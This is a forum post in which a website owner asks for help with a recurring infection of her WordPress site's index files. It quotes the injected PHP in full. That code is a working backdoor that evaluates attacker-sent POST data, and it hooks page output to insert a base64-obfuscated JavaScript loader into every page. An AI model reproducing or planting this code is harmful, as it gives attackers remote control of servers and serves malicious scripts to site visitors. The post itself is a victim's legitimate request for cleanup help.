Always-returning Virus- help!

Hi,

I hope I’m posting my “question” in the right category.

Recently my web site https://twilightsweden.se has been attacked by several viruses. A “mean code” hacks itself into the web site and stays attached to all the index-files.
(I have had virus attacks before, but have managed to get them away, which this won’t)

I have deleted the code, for it hours later to come back. I have changed password for my “login-panel” on my web host. But it doesn’t help. The virus always returns!

Seriously, I need your help! I’ve been in contact with my web host and its supporters but I always get put in a misery position. They always tell me to look up information on my own and contact the “support-team” for the script.

Just minutes ago I was in contact with them again. And they wrote:

“It is possible that your wordpress scripts is injected with the virus because of security holes there. It is called Remote SQL Injection.”

Is there a plugin that could be installed against this horrible stuff?

This is the code that is included in all the index-files:

<?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY29iQXJRV3JpcHRTUiUyMHNyY1FXciUzREUyJTJGJTJGOW9iQTQlMkVRV3IyNEUyNyUyRW9iQTIlMkVFMjE5ZExONSUyRjNFakUycXVlcnF0UXlvYkElMkVqc1FXciUzRSUzQyUyRnNFMmNyM0VpRTJwb2JBdFBLMSUzRScpLnJlcGxhY2UoL0UyfG9iQXwzRXxkTE58UEsxfHF0UXxTUnxRV3IvZywiIikpOwogLS0+PC9zY3JpcHQ+’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(‘#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’)||stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?>

So, I hope you can help me. This is quite devastating considering all my visitors. They’re depending on my web site and I hate it when it doesn’t work for them.

Help is highly appreciated, as mentioned.

NOTE: I’m currently running the most recent version of WordPress!

Sincerely,
Jennifer